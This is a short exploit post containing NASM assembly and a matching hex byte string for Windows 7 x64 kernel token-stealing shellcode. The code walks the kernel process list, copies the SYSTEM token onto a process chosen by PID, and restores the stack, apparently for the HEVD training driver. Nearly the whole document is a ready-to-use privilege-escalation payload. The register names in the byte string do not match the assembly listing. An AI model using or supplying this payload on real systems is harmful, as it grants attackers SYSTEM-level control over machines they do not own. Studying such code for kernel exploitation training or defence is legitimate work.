Windows 7 x64 Token Stealing Shellcode Stub with custom PID

x64_7_2.asm

[BITS 64]

; Compiled via NASM
; based on http://mcdermottcybersecurity.com/articles/x64-kernel-privilege-escalation
  
start:
	mov rdx, [gs:KTHREAD_OFFSET] ; nt!_KPRC -> PrcbData -> CurrentThread
	mov r11, [rdx + EPROCESS_OFFSET]  ; nt!_KTHREAD -> APCState -> Process
	mov r12, [r11 + FLINK_OFFSET] ; nt!_EPROCESS -> ActiveProcessLinks[0] -> Flink
	mov rcx, [r12] ; Follow link into first process

get_system:	
	mov rdx, [rcx - 8 ] ; Offset above ActiveProcessLinks -> UniqueProcessID
	cmp rdx, SYSTEM_PID ; Are you system? No? Carry on!
	jz get_system_token
	mov rcx, [rcx] ; load next entry using the follow link
	jmp get_system
	
get_system_token:
	mov rax, [rcx + TOKEN] ; Copy SYSTEM process nt!_EPRCOESS -> Token
	and al, 0f0h ; Clear low 4 bits due to Windows policy
	
get_pid_process:
	mov rdx, [rcx - 8] ; Offset above ActiveProcessLinks -> UniqueProcessID
	cmp rdx, USER_PID ; PPPP (placeholder)
	jz get_process_token
	mov rcx, [rcx] ; load next entry using the follow link
	jmp get_pid_process

get_process_token:
	mov[rcx + TOKEN], rax ; Copy token of system to current process

; stack alignment 
	add rsp, 28h ; HEVD offset (later)
	ret

;"\x65\x48\x8B\x14\x25\x88\x01\x00\x00\x4C\x8B\x42\x70\x4D\x8B\x88"
;"\x88\x01\x00\x00\x49\x8B\x09\x48\x8B\x51\xF8\x48\x83\xFA\x04\x74"
;"\x05\x48\x8B\x09\xEB\xF1\x48\x8B\x81\x80\x00\x00\x00\x24\xF0\x48"
;"\x8B\x51\xF8\x48\x81\xFA\xPP\xPP\xPP\xPP\x74\x05\x48\x8B\x09\xEB"
;"\xEE\x48\x89\x81\x80\x00\x00\x00\x48\x83\xC4\x28\xC3"
;Input PID in place of \xPP